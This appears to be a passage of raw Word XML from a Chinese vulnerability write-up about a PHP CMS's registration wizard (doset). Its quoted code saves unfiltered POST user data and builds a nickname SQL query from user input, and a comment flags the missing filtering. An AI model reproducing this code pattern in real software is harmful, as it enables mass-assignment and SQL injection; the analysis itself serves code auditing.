            <v:rect id="_x0000_s5104" style="position:absolute;left:1617;top:3442;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5103" style="position:absolute;left:1797;top:3505;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5102" style="position:absolute;left:1617;top:3768;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5101" style="position:absolute;left:1797;top:3831;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5100" style="position:absolute;left:1617;top:4094;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5099" style="position:absolute;left:1797;top:4157;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5098" style="position:absolute;left:2713;top:4157;width:5422;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5097" style="position:absolute;left:1617;top:4420;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5096" style="position:absolute;left:1797;top:4483;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5095" style="position:absolute;left:1617;top:4746;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5094" style="position:absolute;left:1797;top:4809;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5093" style="position:absolute;left:1617;top:5072;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5092" style="position:absolute;left:1797;top:5135;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5091" style="position:absolute;left:2713;top:5135;width:5543;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5090" style="position:absolute;left:1617;top:5398;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5089" style="position:absolute;left:1797;top:5461;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5088" style="position:absolute;left:1617;top:5724;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5087" style="position:absolute;left:1797;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5086" style="position:absolute;left:1897;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5085" style="position:absolute;left:1997;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5084" style="position:absolute;left:2097;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5083" style="position:absolute;left:2197;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5082" style="position:absolute;left:2297;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5081" style="position:absolute;left:2397;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5080" style="position:absolute;left:2497;top:5787;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5079" style="position:absolute;left:2597;top:5787;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5078" style="position:absolute;left:5368;top:5787;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5077" style="position:absolute;left:1617;top:6050;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5076" style="position:absolute;left:1797;top:6113;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5075" style="position:absolute;left:1617;top:6376;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5074" style="position:absolute;left:1797;top:6439;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5073" style="position:absolute;left:1617;top:6702;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5072" style="position:absolute;left:1797;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5071" style="position:absolute;left:1897;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5070" style="position:absolute;left:1997;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5069" style="position:absolute;left:2097;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5068" style="position:absolute;left:2197;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5067" style="position:absolute;left:2297;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5066" style="position:absolute;left:2397;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5065" style="position:absolute;left:2497;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5064" style="position:absolute;left:2597;top:6735;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5063" style="position:absolute;left:2838;top:6735;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5062" style="position:absolute;left:2938;top:6735;width:450;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5061" style="position:absolute;left:3388;top:6735;width:964;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5060" style="position:absolute;left:1617;top:7028;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5059" style="position:absolute;left:1797;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5058" style="position:absolute;left:1897;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5057" style="position:absolute;left:1997;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5056" style="position:absolute;left:2097;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5055" style="position:absolute;left:2197;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5054" style="position:absolute;left:2297;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5053" style="position:absolute;left:2397;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5052" style="position:absolute;left:2497;top:7091;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5051" style="position:absolute;left:1617;top:7354;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5050" style="position:absolute;left:1797;top:7417;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5049" style="position:absolute;left:1617;top:7680;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5048" style="position:absolute;left:1797;top:7743;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5047" style="position:absolute;left:5050;top:7743;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5046" style="position:absolute;left:5171;top:7743;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5045" type="#_x0000_t202" style="position:absolute;left:1614;top:325;width:6750;height:7863" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="10"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="338" w:lineRule="auto"/>
                      <w:ind w:left="579" w:right="2788" w:hanging="39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保存设置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注册用户时候，向导保存设置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 xml:space="preserve">public function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doset(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 {</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="44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$user=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M(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'Users');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="65"/>
                      <w:ind w:left="2012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$userdata=$_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POST[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"user"];//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获取用户提交</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="50"/>
                      <w:ind w:left="1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的所有数据</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62" w:line="283" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50" w:firstLine="799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color w:val="333333"/>
                        <w:spacing w:val="-6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ok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，此处的用户</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333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userdata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数据是来自</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333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post</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-72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的，而并未过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滤一些敏感字段</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="90" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50" w:firstLine="79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userdata[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"nickname"]=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daddslashes(strip_tags(trim($userdata["nickname"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])))</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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;</w:t>
                    </w:r>
                  </w:p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292EF3">
                    <w:pPr>
                      <w:spacing w:before="3"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="17"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="213" w:firstLine="914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userdata[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'provinceid']=intval($userdata['pro vinceid']);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="27"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="1095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userdata[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'cityid']=intval($userdata['cityid']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50" w:firstLine="79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userdata[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'user_info']=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 xml:space="preserve">daddslashes(trim(htmlspecialchars($userdata['user_in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>fo'])));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="215" w:lineRule="exact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过滤</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-7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nickname</w:t>
                    </w:r>
                  </w:p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292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1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!preg_match('</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>/^[0-9a-zA-Z\xe0-\xef\x80-\xbf._-]+$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/i'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,$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userdata['nickname'])) {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rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23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5043" type="#_x0000_t202" style="width:337.5pt;height:539.8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 w:firstLine="2748"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>setcookie(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'setok', json_encode(array('lang'=&gt;L('setting2'),'ico'=&gt;2)),0, '/');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380" w:right="251"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'location:'.SITE_URL.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/?m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=guide'); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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(!$userdata['nickname']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-6"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>|</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>| !</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$userdata['provinceid'] || !$userdata['cityid'])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 w:firstLine="2748"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>setcookie(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'setok', json_encode(array('lang'=&gt;L('setting1'),'ico'=&gt;2)),0, '/');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380" w:right="251"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'location:'.SITE_URL.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>/?m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=guide'); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit;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9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65"/>
                    <w:ind w:left="1076" w:right="2755"/>
                    <w:jc w:val="center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昵称检测</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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($userdata['nickname'] &amp;&amp;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userdata[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'nickname']!=$this-&gt;my['ni</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ckname']) 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409" w:firstLine="120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(StrLenW($userdata['nickname'])&lt;=12 &amp;&amp; StrLenW($userdata['nickname'])&gt;=3) {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298"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$newnickname=$user-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>where(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"nickname='$userdata[nickn </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ame]'")-&gt;find();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2180" w:right="2380" w:hanging="401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($newnickname) { setcookie('setok',</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>json_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>encode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>array('lang'=&gt;L('setting4'),'ico'=&gt;2)),0, '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/');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header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'location:'.SITE_URL.'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/?m</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>=guide');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1076" w:right="2858"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exit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7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>} else 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4917" style="width:337.75pt;height:279.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,5586">
            <v:rect id="_x0000_s5042" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5041" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5040" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5039" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5038" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5037" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5036" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5035" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5034" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5033" style="position:absolute;left:985;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5032" style="position:absolute;left:1085;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5031" style="position:absolute;left:1185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5030" style="position:absolute;left:1285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5029" style="position:absolute;left:1385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5028" style="position:absolute;left:1485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5027" style="position:absolute;left:1585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5026" style="position:absolute;left:1685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5025" style="position:absolute;left:1785;top:248;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5024" style="position:absolute;left:3954;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5023" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5022" style="position:absolute;left:185;top:574;width:6411;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5021" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5020" style="position:absolute;left:185;top:900;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5019" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5018" style="position:absolute;left:185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5017" style="position:absolute;left:285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5016" style="position:absolute;left:385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5015" style="position:absolute;left:485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5014" style="position:absolute;left:585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5013" style="position:absolute;left:685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5012" style="position:absolute;left:785;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5011" style="position:absolute;left:885;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5010" style="position:absolute;left:985;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5009" style="position:absolute;left:1085;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5008" style="position:absolute;left:1185;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5007" style="position:absolute;left:1285;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5006" style="position:absolute;left:1385;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5005" style="position:absolute;left:1485;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5004" style="position:absolute;left:1585;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5003" style="position:absolute;left:1685;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5002" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5001" style="position:absolute;left:185;top:1552;width:4940;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5000" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4999" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4998" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4997" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4996" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4995" style="position:absolute;left:585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4994" style="position:absolute;left:685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4993" style="position:absolute;left:785;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4992" style="position:absolute;left:885;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4991" style="position:absolute;left:985;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4990" style="position:absolute;left:1085;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4989" style="position:absolute;left:1185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4988" style="position:absolute;left:1285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4987" style="position:absolute;left:1385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4986" style="position:absolute;left:1485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4985" style="position:absolute;left:1585;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4984" style="position:absolute;left:1685;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4983" style="position:absolute;left:1785;top:1878;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4982" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4981" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4980" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4979" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4978" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4977" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4976" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4975" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4974" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4973" style="position:absolute;left:985;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4972" style="position:absolute;left:1085;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4971" style="position:absolute;left:1185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4970" style="position:absolute;left:1285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4969" style="position:absolute;left:1385;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4968" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4967" style="position:absolute;left:185;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4966" style="position:absolute;left:285;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
